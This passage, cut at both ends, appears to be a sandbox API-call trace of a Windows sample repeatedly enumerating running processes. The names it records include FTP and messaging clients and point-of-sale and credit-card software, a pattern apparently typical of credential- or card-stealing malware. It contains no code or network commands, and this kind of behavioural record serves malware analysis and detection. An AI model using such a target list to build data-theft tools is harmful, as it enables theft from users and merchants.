out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0255.460] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0255.462] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0255.463] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0255.483] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0255.485] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0255.487] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0255.488] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0255.490] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0255.492] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0255.493] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0255.495] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0255.499] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0255.501] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0255.503] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0255.504] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0255.506] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0255.507] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0255.509] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0255.510] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0255.515] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0255.516] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0255.518] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0255.519] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0255.521] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0255.522] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0255.524] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.525] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.527] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.580] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.582] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.584] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0255.589] CloseHandle (hObject=0x17b0) returned 1 [0255.589] Sleep (dwMilliseconds=0x64) [0255.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0255.753] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.755] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.757] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.759] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.761] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.767] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.769] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.771] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.773] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.775] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.777] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.802] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.804] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.806] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.808] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.813] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.815] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.817] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.819] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.821] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.823] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0255.828] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0255.830] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.832] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.834] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0255.836] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0255.838] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0255.877] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.879] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0255.881] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0255.883] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.885] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.890] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0255.892] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0255.894] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0255.896] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0255.898] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0255.900] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0256.001] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0256.003] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0256.005] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0256.007] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0256.009] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0256.011] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0256.180] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0256.183] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0256.186] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0256.188] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0256.190] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0256.192] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0256.194] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, 